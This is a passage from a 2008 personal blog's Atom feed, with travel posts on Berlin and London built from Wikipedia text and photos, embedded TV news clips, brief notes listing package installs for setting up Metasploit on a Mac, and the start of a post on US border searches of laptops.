country's largest city.&lt;sup id="cite_ref-1" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-1" title=""&gt;[2]&lt;/a&gt;&lt;/sup&gt; It is the second &lt;a href="http://en.wikipedia.org/wiki/Largest_cities_of_the_European_Union_by_population_within_city_limits" title="Largest cities of the European Union by population within city limits"&gt;most populous city&lt;/a&gt; and the ninth &lt;a href="http://en.wikipedia.org/wiki/Largest_urban_areas_of_the_European_Union" title="Largest urban areas of the European Union"&gt;most populous urban area&lt;/a&gt; in the &lt;a href="http://en.wikipedia.org/wiki/European_Union" title="European Union"&gt;European Union&lt;/a&gt;.&lt;sup id="cite_ref-2" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-2" title=""&gt;[3]&lt;/a&gt;&lt;/sup&gt; Located in northeastern Germany, it is the centre of the Berlin-&lt;a href="http://en.wikipedia.org/wiki/Brandenburg" title="Brandenburg"&gt;Brandenburg&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Larger_Urban_Zones_%28LUZ%29_in_the_European_Union" class="mw-redirect" title="Larger Urban Zones (LUZ) in the European Union"&gt;metropolitan area&lt;/a&gt;, comprising 5 million people from over 180 nations.&lt;sup id="cite_ref-LUZ_3-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-LUZ-3" title=""&gt;[4]&lt;/a&gt;&lt;/sup&gt; &lt;p&gt;First documented in the 13th century, Berlin was successively the capital of the &lt;a href="http://en.wikipedia.org/wiki/Kingdom_of_Prussia" title="Kingdom of Prussia"&gt;Kingdom of Prussia&lt;/a&gt; (1701-1918), the &lt;a href="http://en.wikipedia.org/wiki/German_Empire" title="German Empire"&gt;German Empire&lt;/a&gt; (1871-1918), the &lt;a href="http://en.wikipedia.org/wiki/Weimar_Republic" title="Weimar Republic"&gt;Weimar Republic&lt;/a&gt; (1919-1933) and the &lt;a href="http://en.wikipedia.org/wiki/Nazi_Germany" title="Nazi Germany"&gt;Third Reich&lt;/a&gt; (1933-1945).&lt;sup id="cite_ref-4" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-4" title=""&gt;[5]&lt;/a&gt;&lt;/sup&gt; After the &lt;a href="http://en.wikipedia.org/wiki/Second_World_War" class="mw-redirect" title="Second World War"&gt;Second World War&lt;/a&gt;, the city was divided; &lt;a href="http://en.wikipedia.org/wiki/East_Berlin" title="East Berlin"&gt;East Berlin&lt;/a&gt; became the capital of &lt;a href="http://en.wikipedia.org/wiki/German_Democratic_Republic" class="mw-redirect" title="German Democratic Republic"&gt;East Germany&lt;/a&gt; while &lt;a href="http://en.wikipedia.org/wiki/West_Berlin" title="West Berlin"&gt;West Berlin&lt;/a&gt; became a &lt;a href="http://en.wikipedia.org/wiki/West_Germany" title="West Germany"&gt;Western&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Enclave" class="mw-redirect" title="Enclave"&gt;enclave&lt;/a&gt;, surrounded by the &lt;a href="http://en.wikipedia.org/wiki/Berlin_Wall" title="Berlin Wall"&gt;Berlin Wall&lt;/a&gt; from 1961-1989.&lt;sup id="cite_ref-5" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-5" title=""&gt;[6]&lt;/a&gt;&lt;/sup&gt; Following the &lt;a href="http://en.wikipedia.org/wiki/German_reunification" title="German reunification"&gt;reunification of Germany&lt;/a&gt; in 1990, the city regained its status as the capital of all Germany.&lt;sup id="cite_ref-6" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Berlin#cite_note-6" title=""&gt;[7]&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SGSWjAAQJiI/AAAAAAAAAVE/pICY1cy4g-Q/s1600-h/IMG_2311.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SGSWjAAQJiI/AAAAAAAAAVE/pICY1cy4g-Q/s200/IMG_2311.JPG" alt="" id="BLOGGER_PHOTO_ID_5216459796442523170" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSWjVU2joI/AAAAAAAAAVM/eKJ3gjruGLI/s1600-h/IMG_2312.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSWjVU2joI/AAAAAAAAAVM/eKJ3gjruGLI/s200/IMG_2312.JPG" alt="" id="BLOGGER_PHOTO_ID_5216459802166070914" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSWjVkSbCI/AAAAAAAAAVU/eRzcOK6u6lw/s1600-h/IMG_2319.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSWjVkSbCI/AAAAAAAAAVU/eRzcOK6u6lw/s200/IMG_2319.JPG" alt="" id="BLOGGER_PHOTO_ID_5216459802230811682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SGSWj47SgXI/AAAAAAAAAVk/w6TGCshZYT0/s1600-h/IMG_2326.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SGSWj47SgXI/AAAAAAAAAVk/w6TGCshZYT0/s200/IMG_2326.JPG" alt="" id="BLOGGER_PHOTO_ID_5216459811722527090" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSXdDH3nhI/AAAAAAAAAWU/496icrn4qzo/s1600-h/IMG_2333.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSXdDH3nhI/AAAAAAAAAWU/496icrn4qzo/s200/IMG_2333.JPG" alt="" id="BLOGGER_PHOTO_ID_5216460793712188946" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SGSXdP5COTI/AAAAAAAAAWc/YgrfHJ2bhfc/s1600-h/IMG_2338.JPG"&gt;&lt;img style="cursor: pointer;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SGSXdP5COTI/AAAAAAAAAWc/YgrfHJ2bhfc/s200/IMG_2338.JPG" alt="" id="BLOGGER_PHOTO_ID_5216460797139630386" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SGSXdWZXTKI/AAAAAAAAAWk/c1M2TQqagPM/s1600-h/IMG_2342.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SGSXdWZXTKI/AAAAAAAAAWk/c1M2TQqagPM/s200/IMG_2342.JPG" alt="" id="BLOGGER_PHOTO_ID_5216460798885842082" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSXdTY22OI/AAAAAAAAAWs/aOQsmoT3tps/s1600-h/IMG_2347.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SGSXdTY22OI/AAAAAAAAAWs/aOQsmoT3tps/s200/IMG_2347.JPG" alt="" id="BLOGGER_PHOTO_ID_5216460798078408930" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SHFxTh5SgDI/AAAAAAAAAW0/eHWmznHaOeY/s1600-h/IMG_2346.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SHFxTh5SgDI/AAAAAAAAAW0/eHWmznHaOeY/s200/IMG_2346.JPG" alt="" id="BLOGGER_PHOTO_ID_5220078023429226546" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SHFxT4v2QhI/AAAAAAAAAW8/wTXh3QyXl6Y/s1600-h/IMG_2344.JPG"&gt;&lt;img style="cursor: pointer;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SHFxT4v2QhI/AAAAAAAAAW8/wTXh3QyXl6Y/s200/IMG_2344.JPG" alt="" id="BLOGGER_PHOTO_ID_5220078029563642386" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2619726463476181021?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2619726463476181021/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2619726463476181021' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2619726463476181021'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2619726463476181021'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/07/three-days-in-berlin.html' title='Three Days in Berlin'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SGSWjAAQJiI/AAAAAAAAAVE/pICY1cy4g-Q/s72-c/IMG_2311.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8445253141111000213</id><published>2008-07-04T11:26:00.001+08:00</published><updated>2008-07-04T11:33:54.476+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>IMPACT is alive?</title><content type='html'>&lt;object height="467" width="570"&gt;&lt;param name="movie" value="http://www.ntv7.com.my/App_Themes/ntv7/swf/FlvPlayer_570x467.swf"&gt;&lt;param name="FlashVars" value="flv=http://medprima.vo.llnwd.net/o18/u/ntv7/sec/briefcase/briefcase_290608_02_cft.flv&amp;amp;title=BIZ BRIEFCASE : Episode 66"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.ntv7.com.my/App_Themes/ntv7/swf/FlvPlayer_570x467.swf" type="application/x-shockwave-flash" wmode="transparent" flashvars="flv=http://medprima.vo.llnwd.net/o18/u/ntv7/sec/briefcase/briefcase_290608_02_cft.flv&amp;amp;title=BIZ BRIEFCASE : Episode 66" height="467" width="570"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;show me the move...&lt;br /&gt;&lt;br /&gt;&lt;object height="467" width="570"&gt;&lt;param name="movie" value="http://www.ntv7.com.my/App_Themes/ntv7/swf/FlvPlayer_570x467.swf"&gt;&lt;param name="FlashVars" value="flv=http://medprima.vo.llnwd.net/o18/u/ntv7/sec/briefcase/briefcase_290608_03_cft.flv&amp;amp;title=BIZ BRIEFCASE : Episode 66"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.ntv7.com.my/App_Themes/ntv7/swf/FlvPlayer_570x467.swf" type="application/x-shockwave-flash" wmode="transparent" flashvars="flv=http://medprima.vo.llnwd.net/o18/u/ntv7/sec/briefcase/briefcase_290608_03_cft.flv&amp;amp;title=BIZ BRIEFCASE : Episode 66" height="467" width="570"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8445253141111000213?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8445253141111000213/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8445253141111000213' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8445253141111000213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8445253141111000213'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/07/impact-is-alive.html' title='IMPACT is alive?'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-8712162102452087000</id><published>2008-06-18T06:33:00.011+08:00</published><updated>2008-11-07T10:00:05.778+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Three Days in London</title><content type='html'>&lt;p&gt;&lt;b&gt;London&lt;/b&gt; (&lt;span class="unicode audiolink"&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/c/c3/En-uk-London.ogg" class="internal" title="En-uk-London.ogg"&gt;pronunciation&lt;/a&gt;&lt;/span&gt; &lt;span class="metadata audiolinkinfo"&gt;&lt;small&gt;(&lt;a href="http://en.wikipedia.org/wiki/Wikipedia:Media_help" title="Wikipedia:Media help"&gt;help&lt;/a&gt;·&lt;a href="http://en.wikipedia.org/wiki/Image:En-uk-London.ogg" title="Image:En-uk-London.ogg"&gt;info&lt;/a&gt;)&lt;/small&gt;&lt;/span&gt;; &lt;small&gt;IPA&lt;/small&gt;: &lt;span title="Pronunciation in IPA" class="IPA"&gt;&lt;a href="http://en.wikipedia.org/wiki/Help:IPA_for_English" title="Help:IPA for English"&gt;/ˈlʌndən/&lt;/a&gt;&lt;/span&gt;) is the largest urban area and &lt;a href="http://en.wikipedia.org/wiki/Capital" title="Capital"&gt;capital&lt;/a&gt; of &lt;a href="http://en.wikipedia.org/wiki/England" title="England"&gt;England&lt;/a&gt; and the &lt;a href="http://en.wikipedia.org/wiki/United_Kingdom" title="United Kingdom"&gt;United Kingdom&lt;/a&gt;.&lt;sup id="cite_ref-6" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-6" title=""&gt;[7]&lt;/a&gt;&lt;/sup&gt; An important settlement for two millennia, &lt;a href="http://en.wikipedia.org/wiki/History_of_London" title="History of London"&gt;London's history&lt;/a&gt; goes back to its founding by the &lt;a href="http://en.wikipedia.org/wiki/Roman_Empire" title="Roman Empire"&gt;Romans&lt;/a&gt;.&lt;sup id="cite_ref-7" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-7" title=""&gt;[8]&lt;/a&gt;&lt;/sup&gt; Since its settlement, London has been part of many important movements and phenomena throughout history, such as the &lt;a href="http://en.wikipedia.org/wiki/English_Renaissance" title="English Renaissance"&gt;English Renaissance&lt;/a&gt;, the &lt;a href="http://en.wikipedia.org/wiki/Industrial_Revolution" title="Industrial Revolution"&gt;Industrial Revolution&lt;/a&gt;, and the &lt;a href="http://en.wikipedia.org/wiki/Gothic_Revival_architecture" title="Gothic Revival architecture"&gt;Gothic Revival&lt;/a&gt;.&lt;sup id="cite_ref-8" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-8" title=""&gt;[9]&lt;/a&gt;&lt;/sup&gt;&lt;sup id="cite_ref-9" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-9" title=""&gt;[10]&lt;/a&gt;&lt;/sup&gt; The city's core, the ancient &lt;a href="http://en.wikipedia.org/wiki/City_of_London" title="City of London"&gt;City of London&lt;/a&gt;, still retains its limited mediaeval boundaries; but since at least the 19th century the name "London" has also referred to the whole metropolis which has developed around it.&lt;sup id="cite_ref-mills_10-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-mills-10" title=""&gt;[11]&lt;/a&gt;&lt;/sup&gt; Today the bulk of this &lt;a href="http://en.wikipedia.org/wiki/Conurbation" title="Conurbation"&gt;conurbation&lt;/a&gt; forms the London &lt;a href="http://en.wikipedia.org/wiki/Regions_of_England" title="Regions of England"&gt;region of England&lt;/a&gt;&lt;sup id="cite_ref-region_11-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-region-11" title=""&gt;[12]&lt;/a&gt;&lt;/sup&gt; and the &lt;a href="http://en.wikipedia.org/wiki/Greater_London" title="Greater London"&gt;Greater London&lt;/a&gt; administrative area,&lt;sup id="cite_ref-elcock_12-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-elcock-12" title=""&gt;[13]&lt;/a&gt;&lt;/sup&gt; with its own elected &lt;a href="http://en.wikipedia.org/wiki/Mayor_of_London" title="Mayor of London"&gt;mayor&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/London_Assembly" title="London Assembly"&gt;assembly&lt;/a&gt;.&lt;sup id="cite_ref-politics_uk_13-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/London#cite_note-politics_uk-13" title=""&gt;[14]&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFg8QYSPXbI/AAAAAAAAAS8/m02MrvO-1zg/s1600-h/IMG_2254.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFg8QYSPXbI/AAAAAAAAAS8/m02MrvO-1zg/s200/IMG_2254.JPG" alt="" id="BLOGGER_PHOTO_ID_5212982820775878066" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkLHZNb73I/AAAAAAAAAUM/zUqPCERiz8U/s1600-h/IMG_2253.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkLHZNb73I/AAAAAAAAAUM/zUqPCERiz8U/s200/IMG_2253.JPG" alt="" id="BLOGGER_PHOTO_ID_5213210265312292722" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFg8hAk3tmI/AAAAAAAAATE/G3qTzToPyT4/s1600-h/IMG_2261.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFg8hAk3tmI/AAAAAAAAATE/G3qTzToPyT4/s200/IMG_2261.JPG" alt="" id="BLOGGER_PHOTO_ID_5212983106469344866" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFkJq7Mj46I/AAAAAAAAATs/UADa3QC5hJo/s1600-h/IMG_2260.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFkJq7Mj46I/AAAAAAAAATs/UADa3QC5hJo/s200/IMG_2260.JPG" alt="" id="BLOGGER_PHOTO_ID_5213208676707591074" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFkJrB7ne6I/AAAAAAAAAT8/gcDP6mKAmMM/s1600-h/IMG_2296.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFkJrB7ne6I/AAAAAAAAAT8/gcDP6mKAmMM/s200/IMG_2296.JPG" alt="" id="BLOGGER_PHOTO_ID_5213208678515571618" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFg9Gcxn3fI/AAAAAAAAATM/Xmb7m6QW62s/s1600-h/IMG_2267.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFg9Gcxn3fI/AAAAAAAAATM/Xmb7m6QW62s/s200/IMG_2267.JPG" alt="" id="BLOGGER_PHOTO_ID_5212983749694184946" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFkJq6vHFCI/AAAAAAAAATk/NjAcO5wWAW0/s1600-h/IMG_2255.JPG"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SFkJq6vHFCI/AAAAAAAAATk/NjAcO5wWAW0/s200/IMG_2255.JPG" alt="" id="BLOGGER_PHOTO_ID_5213208676584068130" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkLnPpIxxI/AAAAAAAAAUc/GSgipA_dlYM/s1600-h/IMG_2266.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkLnPpIxxI/AAAAAAAAAUc/GSgipA_dlYM/s200/IMG_2266.JPG" alt="" id="BLOGGER_PHOTO_ID_5213210812499937042" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFg9G1US_3I/AAAAAAAAATU/WE-dc4Nlyw4/s1600-h/IMG_2277.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFg9G1US_3I/AAAAAAAAATU/WE-dc4Nlyw4/s200/IMG_2277.JPG" alt="" id="BLOGGER_PHOTO_ID_5212983756282068850" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFkLHq_pmAI/AAAAAAAAAUU/zS8r2I5G45U/s1600-h/IMG_2282.JPG"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SFkLHq_pmAI/AAAAAAAAAUU/zS8r2I5G45U/s200/IMG_2282.JPG" alt="" id="BLOGGER_PHOTO_ID_5213210270086305794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMDU9_t9I/AAAAAAAAAU0/drzYe0NTs-M/s1600-h/IMG_2274.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMDU9_t9I/AAAAAAAAAU0/drzYe0NTs-M/s200/IMG_2274.JPG" alt="" id="BLOGGER_PHOTO_ID_5213211294965938130" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMDLv0W6I/AAAAAAAAAUs/1C-FJ7WZh0o/s1600-h/IMG_2275.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMDLv0W6I/AAAAAAAAAUs/1C-FJ7WZh0o/s200/IMG_2275.JPG" alt="" id="BLOGGER_PHOTO_ID_5213211292490554274" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMoKBY1LI/AAAAAAAAAU8/gAYvkf2j2c8/s1600-h/IMG_2299.JPG"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SFkMoKBY1LI/AAAAAAAAAU8/gAYvkf2j2c8/s200/IMG_2299.JPG" alt="" id="BLOGGER_PHOTO_ID_5213211927682536626" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8712162102452087000?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8712162102452087000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8712162102452087000' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8712162102452087000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8712162102452087000'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/06/three-days-in-london.html' title='Three Days in London'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SFg8QYSPXbI/AAAAAAAAAS8/m02MrvO-1zg/s72-c/IMG_2254.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3011319671819480710</id><published>2008-05-05T10:46:00.002+08:00</published><updated>2008-05-05T11:11:50.383+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Metasploit on Mac OS X</title><content type='html'>I just don't want to forget these steps.&lt;br /&gt;&lt;br /&gt;root@Slash-The-Undergrounds-MacBook-Pro:# port -dv install ruby rb-rubygems&lt;br /&gt;root@Slash-The-Undergrounds-MacBook-Pro:# gem install rails&lt;br /&gt;root@Slash-The-Undergrounds-MacBook-Pro:# port -dv install libgalde2 pango gtk2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3011319671819480710?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3011319671819480710/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3011319671819480710' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3011319671819480710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3011319671819480710'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/05/metasploit-on-mac-os-x.html' title='Metasploit on Mac OS X'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2442562884259505727</id><published>2008-05-04T02:48:00.002+08:00</published><updated>2008-05-04T02:51:49.873+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>US OWNS YOUR DATA!</title><content type='html'>&lt;blockquote&gt;&lt;/blockquote&gt;In a letter dated Thursday, the group, which includes the Electronic Frontier Foundation (EFF), the American Civil Liberties Union and the Business Travel Coalition, called on the House Committee on Homeland Security to ensure searches aren’t arbitrary or overly invasive. They also urged the passage of legislation outlawing abusive searches.&lt;br /&gt;&lt;br /&gt;The letter comes 10 days after a US appeals court ruled Customs and Border Protection (CBP) agents have the right to rummage through electronic devices even if they have no reason to suspect the hardware holds illegal contents. Not only are they free to view the files during passage; they are also permitted to copy the entire contents of a device. There are no stated policies about what can and can’t be done with the data.&lt;br /&gt;&lt;br /&gt;I hope the government takes some notice of the letter and the worries over this legislation, it is something that would bother a lot of people. Especially those from European countries where privacy is an utmost concern and strongly protected by the government.&lt;br /&gt;&lt;br /&gt;The lack of guidelines as to what can be done with the data are worrying too, what if you have commercially valuable or proprietary information there…can they distribute it freely after copying it from you?&lt;br /&gt;&lt;br /&gt;Several of the groups are also providing advice to US-bound travelers carrying electronic devices. The Association of Corporate Travel Executives is encouraging members to remove photos, financial information and other personal data before leaving home. This is good advice even if you’re not traveling to the US. There is no reason to store five years worth of email on a portable machine.&lt;br /&gt;&lt;br /&gt;In this posting, the EFF agrees that laptops, cell phones, digital cameras and other gizmos should be 